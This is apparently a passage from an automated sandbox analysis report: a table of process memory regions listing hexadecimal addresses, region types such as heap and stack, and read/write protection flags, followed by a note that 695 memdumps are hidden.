224E3E58000
|
heap
|
page read and write
|
||
1DF6AD02000
|
heap
|
page read and write
|
||
23503457000
|
heap
|
page read and write
|
||
1DF6AD02000
|
heap
|
page read and write
|
||
57303F9000
|
stack
|
page read and write
|
||
1FC7CFBC000
|
heap
|
page read and write
|
||
1992F240000
|
heap
|
page read and write
|
||
1DF6ACA4000
|
heap
|
page read and write
|
||
1DF6AD19000
|
heap
|
page read and write
|
||
1DF6AC1D000
|
heap
|
page read and write
|
||
1FC7CFA1000
|
heap
|
page read and write
|
||
224E47C0000
|
heap
|
page read and write
|
||
1DDD072C000
|
heap
|
page read and write
|
||
224E4830000
|
heap
|
page read and write
|
||
BE39ACB000
|
stack
|
page read and write
|
||
9F872FE000
|
stack
|
page read and write
|
||
1DF6A981000
|
trusted library allocation
|
page read and write
|
||
224E3E3C000
|
heap
|
page read and write
|
||
1DF65D18000
|
heap
|
page read and write
|
||
1DE06738000
|
heap
|
page read and write
|
||
2350344E000
|
heap
|
page read and write
|
||
1FC7C667000
|
heap
|
page read and write
|
||
1FDF925E000
|
heap
|
page read and write
|
||
224E4754000
|
heap
|
page read and write
|
||
23883504000
|
heap
|
page read and write
|
||
1FC7C6D2000
|
heap
|
page read and write
|
||
19F52D60000
|
heap
|
page read and write
|
||
1FC7D402000
|
heap
|
page read and write
|
||
1DF6AAE0000
|
remote allocation
|
page read and write
|
||
1DF6ACF9000
|
heap
|
page read and write
|
||
23503400000
|
heap
|
page read and write
|
||
1DF6ACD7000
|
heap
|
page read and write
|
||
39167FF000
|
stack
|
page read and write
|
||
224E476F000
|
heap
|
page read and write
|
||
1FDF9880000
|
trusted library allocation
|
page read and write
|
||
1DF65502000
|
heap
|
page read and write
|
||
64AF07F000
|
stack
|
page read and write
|
||
19F52E40000
|
heap
|
page read and write
|
||
1DF65C15000
|
heap
|
page read and write
|
||
1FC7CFA0000
|
heap
|
page read and write
|
||
2350344D000
|
heap
|
page read and write
|
||
1DF65C02000
|
heap
|
page read and write
|
||
1DF66440000
|
trusted library section
|
page readonly
|
||
207A577000
|
stack
|
page read and write
|
||
1FC7CF88000
|
heap
|
page read and write
|
||
9F873FE000
|
stack
|
page read and write
|
||
1FC7CF9A000
|
heap
|
page read and write
|
||
1DF65E01000
|
trusted library allocation
|
page read and write
|
||
1DF6A800000
|
trusted library allocation
|
page read and write
|
||
6D06BFD000
|
stack
|
page read and write
|
||
1992F4C8000
|
heap
|
page read and write
|
||
1FC7C450000
|
heap
|
page read and write
|
||
207A17E000
|
stack
|
page read and write
|
||
1FDF9245000
|
heap
|
page read and write
|
||
2350343C000
|
heap
|
page read and write
|
||
1DF6A7F0000
|
trusted library allocation
|
page read and write
|
||
24EC3F7000
|
stack
|
page read and write
|
||
1FD8B858000
|
heap
|
page read and write
|
||
2A064A53000
|
heap
|
page read and write
|
||
1DF65D18000
|
heap
|
page read and write
|
||
21CDD652000
|
heap
|
page read and write
|
||
1FC7CF88000
|
heap
|
page read and write
|
||
1DF6ACFF000
|
heap
|
page read and write
|
||
2A064A02000
|
heap
|
page read and write
|
||
1FC7CFA0000
|
heap
|
page read and write
|
||
1DF6A823000
|
trusted library allocation
|
page read and write
|
||
1DF6ACFF000
|
heap
|
page read and write
|
||
1FC7CF8A000
|
heap
|
page read and write
|
||
1FC7CF9A000
|
heap
|
page read and write
|
||
1FDF9213000
|
heap
|
page read and write
|
||
64AF97F000
|
stack
|
page read and write
|
||
1FC7C67F000
|
heap
|
page read and write
|
||
23881C15000
|
heap
|
page read and write
|
||
391677F000
|
stack
|
page read and write
|
||
23503491000
|
heap
|
page read and write
|
||
1DF65BF0000
|
trusted library allocation
|
page read and write
|
||
BBB69DE000
|
stack
|
page read and write
|
||
224E3D10000
|
heap
|
page read and write
|
||
573047F000
|
stack
|
page read and write
|
||
1FC7CC70000
|
remote allocation
|
page read and write
|
||
1FC7C6F6000
|
heap
|
page read and write
|
||
1DDD06D0000
|
heap
|
page read and write
|
||
1DF6AD06000
|
heap
|
page read and write
|
||
1FC7CF84000
|
heap
|
page read and write
|
||
19F53550000
|
remote allocation
|
page read and write
|
||
1FDF923B000
|
heap
|
page read and write
|
||
1FDF9279000
|
heap
|
page read and write
|
||
9F8727F000
|
stack
|
page read and write
|
||
1FC7CFAB000
|
heap
|
page read and write
|
||
21CDD646000
|
heap
|
page read and write
|
||
1FC7CF9A000
|
heap
|
page read and write
|
||
224E4827000
|
heap
|
page read and write
|
||
1FC7D402000
|
heap
|
page read and write
|
||
1DF6A9B0000
|
trusted library allocation
|
page read and write
|
||
23503413000
|
heap
|
page read and write
|
||
1FDF926C000
|
heap
|
page read and write
|
||
1FC7CC70000
|
remote allocation
|
page read and write
|
||
24EC5FF000
|
stack
|
page read and write
|
||
1FC7CF92000
|
heap
|
page read and write
|
||
207A47E000
|
stack
|
page read and write
|
||
2350344A000
|
heap
|
page read and write
|
||
21CDD3B0000
|
heap
|
page read and write
|
||
2350347B000
|
heap
|
page read and write
|
||
1FC7CFA0000
|
heap
|
page read and write
|
||
1FC7C6E7000
|
heap
|
page read and write
|
||
224E3FB9000
|
heap
|
page read and write
|
||
1FC7C65B000
|
heap
|
page read and write
|
||
1FD8B868000
|
heap
|
page read and write
|
||
1FDF90C0000
|
heap
|
page read and write
|
||
1FD8B829000
|
heap
|
page read and write
|
||
1FC7D452000
|
heap
|
page read and write
|
||
9F8747E000
|
stack
|
page read and write
|
||
1DF65D59000
|
heap
|
page read and write
|
||
1FC7C702000
|
heap
|
page read and write
|
||
1FC7CFAA000
|
heap
|
page read and write
|
||
BE3A2FE000
|
stack
|
page read and write
|
||
1FC7CF7D000
|
heap
|
page read and write
|
||
1DF6ABF0000
|
trusted library allocation
|
page read and write
|
||
64AF87E000
|
stack
|
page read and write
|
||
1DF6A985000
|
trusted library allocation
|
page read and write
|
||
2A0649C0000
|
trusted library allocation
|
page read and write
|
||
1DF6AD09000
|
heap
|
page read and write
|
||
1FC7CFC1000
|
heap
|
page read and write
|
||
1FC7CF72000
|
heap
|
page read and write
|
||
1DF6A988000
|
trusted library allocation
|
page read and write
|
||
21CDD600000
|
heap
|
page read and write
|
||
8807FC000
|
stack
|
page read and write
|
||
39164F9000
|
stack
|
page read and write
|
||
391607B000
|
stack
|
page read and write
|
||
1DF6A870000
|
trusted library allocation
|
page read and write
|
||
1DF6AD31000
|
heap
|
page read and write
|
||
1FD8B83E000
|
heap
|
page read and write
|
||
1992F4BD000
|
heap
|
page read and write
|
||
1FD8B85C000
|
heap
|
page read and write
|
||
1DF6A98B000
|
trusted library allocation
|
page read and write
|
||
1FC7D403000
|
heap
|
page read and write
|
||
1FC7D402000
|
heap
|
page read and write
|
||
1DF667F0000
|
trusted library allocation
|
page read and write
|
||
2A064860000
|
heap
|
page read and write
|
||
1DF6AAA0000
|
trusted library allocation
|
page read and write
|
||
1FC7C65E000
|
heap
|
page read and write
|
||
1FDF926A000
|
heap
|
page read and write
|
||
2A064A29000
|
heap
|
page read and write
|
||
1DF6AD02000
|
heap
|
page read and write
|
||
1992FC02000
|
heap
|
page read and write
|
||
2350346F000
|
heap
|
page read and write
|
||
1DF6A9C4000
|
trusted library allocation
|
page read and write
|
||
88077F000
|
stack
|
page read and write
|
||
21CDDC02000
|
trusted library allocation
|
page read and write
|
||
1FDF927D000
|
heap
|
page read and write
|
||
1992F400000
|
heap
|
page read and write
|
||
1FC7CF92000
|
heap
|
page read and write
|
||
1FC7CF82000
|
heap
|
page read and write
|
||
23503456000
|
heap
|
page read and write
|
||
1DF6ACFA000
|
heap
|
page read and write
|
||
1DF65D18000
|
heap
|
page read and write
|
||
1FC7CE02000
|
heap
|
page read and write
|
||
224E3E90000
|
heap
|
page read and write
|
||
23881B94000
|
heap
|
page read and write
|
||
1DF6AAE0000
|
remote allocation
|
page read and write
|
||
1DF6ACA2000
|
heap
|
page read and write
|
||
1FDF9246000
|
heap
|
page read and write
|
||
1FC7CF8E000
|
heap
|
page read and write
|
||
94473FF000
|
stack
|
page read and write
|
||
1DF6AD07000
|
heap
|
page read and write
|
||
23503488000
|
heap
|
page read and write
|
||
BBB717F000
|
stack
|
page read and write
|
||
1FC7CC70000
|
remote allocation
|
page read and write
|
||
3916277000
|
stack
|
page read and write
|
||
572FFDC000
|
stack
|
page read and write
|
||
1DF6AD0F000
|
heap
|
page read and write
|
||
1FDF9244000
|
heap
|
page read and write
|
||
224E4722000
|
heap
|
page read and write
|
||
1DDD06B0000
|
trusted library allocation
|
page read and write
|
||
1FDF9A02000
|
trusted library allocation
|
page read and write
|
||
1DDD0640000
|
trusted library allocation
|
page read and write
|
||
224E3E00000
|
heap
|
page read and write
|
||
23881B30000
|
heap
|
page read and write
|
||
1DF6ACF9000
|
heap
|
page read and write
|
||
1DF65BF3000
|
trusted library allocation
|
page read and write
|
||
2A064A00000
|
heap
|
page read and write
|
||
207A9FF000
|
stack
|
page read and write
|
||
1DF6AD19000
|
heap
|
page read and write
|
||
1FC7C613000
|
heap
|
page read and write
|
||
1DE06A45000
|
heap
|
page read and write
|
||
1DF65B90000
|
trusted library section
|
page read and write
|
||
24EC1FB000
|
stack
|
page read and write
|
||
1DF6548B000
|
heap
|
page read and write
|
||
1DF6AD0F000
|
heap
|
page read and write
|
||
BBB6F77000
|
stack
|
page read and write
|
||
23881940000
|
heap
|
page read and write
|
||
BE3A3FA000
|
stack
|
page read and write
|
||
6D06D7E000
|
stack
|
page read and write
|
||
1FC7CFA5000
|
heap
|
page read and write
|
||
1FDF9248000
|
heap
|
page read and write
|
||
1DF6AC2B000
|
heap
|
page read and write
|
||
1DF6AD34000
|
heap
|
page read and write
|
||
207A278000
|
stack
|
page read and write
|
||
224E4800000
|
heap
|
page read and write
|
||
2079D8E000
|
stack
|
page read and write
|
||
84FC7FF000
|
stack
|
page read and write
|
||
1DF65D9A000
|
heap
|
page read and write
|
||
224E4813000
|
heap
|
page read and write
|
||
224E3D00000
|
heap
|
page read and write
|
||
19F52E13000
|
heap
|
page read and write
|
||
1DF6A98F000
|
trusted library allocation
|
page read and write
|
||
1FC7CF9A000
|
heap
|
page read and write
|
||
1DDD0650000
|
trusted library allocation
|
page read and write
|
||
C58E8FC000
|
stack
|
page read and write
|
||
1DF6AA50000
|
trusted library allocation
|
page read and write
|
||
1DF652C0000
|
heap
|
page read and write
|
||
23881A80000
|
heap
|
page read and write
|
||
1FC7CF9A000
|
heap
|
page read and write
|
||
1DF66350000
|
trusted library allocation
|
page read and write
|
||
1FC7CF7D000
|
heap
|
page read and write
|
||
1DF6AD13000
|
heap
|
page read and write
|
||
1FC7C6DF000
|
heap
|
page read and write
|
||
1FC7CFAB000
|
heap
|
page read and write
|
||
1FDF9258000
|
heap
|
page read and write
|
||
1DDD070D000
|
heap
|
page read and write
|
||
1FC7C66C000
|
heap
|
page read and write
|
||
1DDD0609000
|
heap
|
page read and write
|
||
24EC4FF000
|
stack
|
page read and write
|
||
1FC7C6B1000
|
heap
|
page read and write
|
||
224E4702000
|
heap
|
page read and write
|
||
23883C20000
|
heap
|
page read and write
|
||
1DF6AD19000
|
heap
|
page read and write
|
||
1FC7CFA5000
|
heap
|
page read and write
|
||
1FC7CF81000
|
heap
|
page read and write
|
||
1FD8B902000
|
heap
|
page read and write
|
||
1DF6AD22000
|
heap
|
page read and write
|
||
1DF6AD13000
|
heap
|
page read and write
|
||
1FC7CF81000
|
heap
|
page read and write
|
||
9F874FA000
|
stack
|
page read and write
|
||
1FDF9200000
|
heap
|
page read and write
|
||
1992F502000
|
heap
|
page read and write
|
||
1DF6A9A4000
|
trusted library allocation
|
page read and write
|
||
23881C27000
|
heap
|
page read and write
|
||
207A5FF000
|
stack
|
page read and write
|
||
1FC7CF7E000
|
heap
|
page read and write
|
||
1FC7C6A7000
|
heap
|
page read and write
|
||
1DF6AD06000
|
heap
|
page read and write
|
||
1FC7CFAB000
|
heap
|
page read and write
|
||
1DF6AD0F000
|
heap
|
page read and write
|
||
BBB6D7B000
|
stack
|
page read and write
|
||
1FDF925A000
|
heap
|
page read and write
|
||
224E4722000
|
heap
|
page read and write
|
||
19F52E51000
|
heap
|
page read and write
|
||
1DF6AD06000
|
heap
|
page read and write
|
||
1FC7D402000
|
heap
|
page read and write
|
||
1DF6ACFD000
|
heap
|
page read and write
|
||
1DF6A986000
|
trusted library allocation
|
page read and write
|
||
1FC7CF9A000
|
heap
|
page read and write
|
||
1DDD13E0000
|
trusted library allocation
|
page read and write
|
||
1FC7CF84000
|
heap
|
page read and write
|
||
1DF6548D000
|
heap
|
page read and write
|
||
BE3A07E000
|
stack
|
page read and write
|
||
BBB6E7B000
|
stack
|
page read and write
|
||
C58E3EC000
|
stack
|
page read and write
|
||
1DF6AC00000
|
heap
|
page read and write
|
||
C58E9F9000
|
stack
|
page read and write
|
||
19F52F02000
|
heap
|
page read and write
|
||
1DF6A9A1000
|
trusted library allocation
|
page read and write
|
||
21CDD713000
|
heap
|
page read and write
|
||
64AF47D000
|
stack
|
page read and write
|
||
1DF65320000
|
heap
|
page read and write
|
||
1DE066F0000
|
heap
|
page read and write
|
||
1DF65477000
|
heap
|
page read and write
|
||
23503429000
|
heap
|
page read and write
|
||
1FC7C665000
|
heap
|
page read and write
|
||
1DF65D18000
|
heap
|
page read and write
|
||
1DDD07C0000
|
trusted library allocation
|
page read and write
|
||
6D0687C000
|
stack
|
page read and write
|
||
BE39EFB000
|
stack
|
page read and write
|
||
21CDD650000
|
heap
|
page read and write
|
||
1FC7C6E6000
|
heap
|
page read and write
|
||
1FC7C716000
|
heap
|
page read and write
|
||
391687E000
|
stack
|
page read and write
|
||
1FC7CF9F000
|
heap
|
page read and write
|
||
1DF654FB000
|
heap
|
page read and write
|
||
224E3E77000
|
heap
|
page read and write
|
||
1DF65C00000
|
heap
|
page read and write
|
||
23503200000
|
heap
|
page read and write
|
||
880A7D000
|
stack
|
page read and write
|
||
1DE06721000
|
heap
|
page read and write
|
||
1DF6AD06000
|
heap
|
page read and write
|
||
1DDD06C8000
|
heap
|
page read and write
|
||
224E3E88000
|
heap
|
page read and write
|
||
1DF6AAD0000
|
trusted library allocation
|
page read and write
|
||
1FDF9283000
|
heap
|
page read and write
|
||
1FDF9241000
|
heap
|
page read and write
|
||
2A064A30000
|
heap
|
page read and write
|
||
84FC399000
|
stack
|
page read and write
|
||
207A377000
|
stack
|
page read and write
|
||
9F86FFA000
|
stack
|
page read and write
|
||
1DF6AC3C000
|
heap
|
page read and write
|
||
1DDD070D000
|
heap
|
page read and write
|
||
21CDD670000
|
heap
|
page read and write
|
||
1DF65D9C000
|
heap
|
page read and write
|
||
1DF6AD02000
|
heap
|
page read and write
|
||
19F52DF0000
|
trusted library allocation
|
page read and write
|
||
1FD8B800000
|
heap
|
page read and write
|
||
224E3E6F000
|
heap
|
page read and write
|
||
1FC7CFBE000
|
heap
|
page read and write
|
||
1DF6A980000
|
trusted library allocation
|
page read and write
|
||
1DF6AD09000
|
heap
|
page read and write
|
||
1FD8B802000
|
heap
|
page read and write
|
||
1DE06710000
|
heap
|
page read and write
|
||
1FC7CF70000
|
heap
|
page read and write
|
There are 695 hidden memdumps, click here to show them.